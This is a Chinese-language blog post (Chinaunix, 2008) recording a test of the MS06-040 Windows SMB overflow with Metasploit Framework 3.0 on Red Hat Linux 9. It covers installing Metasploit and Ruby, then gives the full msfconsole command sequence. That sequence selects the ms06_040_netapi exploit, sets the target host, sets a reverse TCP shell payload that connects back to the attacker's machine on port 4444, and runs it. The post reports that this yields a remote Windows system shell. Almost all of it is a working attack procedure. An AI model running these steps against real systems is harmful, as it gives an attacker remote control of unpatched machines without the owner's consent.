Chinaunix首页 | 论坛 | 博客
  • 博客访问: 1445106
  • 博文数量: 47
  • 博客积分: 2010
  • 博客等级: 大尉
  • 技术积分: 520
  • 用 户 组: 普通用户
  • 注册时间: 2008-06-14 15:37
文章分类

全部博文(47)

文章存档

2008年(47)

我的朋友
最近访客

分类: LINUX

2008-06-15 21:11:44

redhat linux 9下ms06_040漏洞溢出测试笔记
下载Metasploit Framework 3.0 (linux服务器溢出通用工具)
下载地址:
解压安装  framework-3.0.tar.gz
#tar -xzvf  framework-3.0.tar.gz
#cd framework-3.0
#./msfconsole
//出现画面:
       =[msf v3.0
+ -- --=[176 exploits -104 payloads
+ -- --=[17 encoders-5 nops
       =[30 aux

--/*-----------------
出现错误/usr/bin/nev: ruby: no foud file or diretory
需要安装Ruby
下载地址为:ftp://ftp.ruby-lang.org/pub/ruby/ruby-1.8.5.tar.gz
# ./configure
# make
# make install (run as root)
---*/-----------------

#show exploits //显示可用的exploit
#use windows/smb/ms06_040_netapi                 //打开一个exploit
msf exploit(ms06_040_netapi) > show options      //显示可用功能(参数)

 Name   current setting  required   desciption
 RHOST             yes      省略 
 RPORT    445      yes
 SMBPIPE  BROWSER  yes

exploit target:             
   id        name
    --        ---
    0   (wcscpt) automatic (NT4.0 2000 sp0-sp4 xp sp0-sp1) 


    0     // 代表自动,可选.0-5  可以用show targets 显示exploit支持的操作系统
                                 // 用set target  (0-5)  设置
msf exploit(ms06_040_netapi) > set RHOST 192.168.1.154   // (远程计算机,即溢出的计算机)
msf exploit(ms06_040_netapi) > set payload windows/shell_reverse_tcp  // (溢出后的方式反弹reverse tcp stager,
                                                                     //可用show payloads 显示,有好多种)
msf exploit(ms06_040_netapi) > set LHOST 192.168.1.155    //  (反弹本地计算机)
msf exploit(ms06_040_netapi) > set LPORT 4444             // (反弹本地计算机端口)      
设置好后
msf exploit(ms06_040_netapi) > exploit

成功后得到一个windows 系统shell
c:\windows\system32>    
 

 

阅读(1007) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~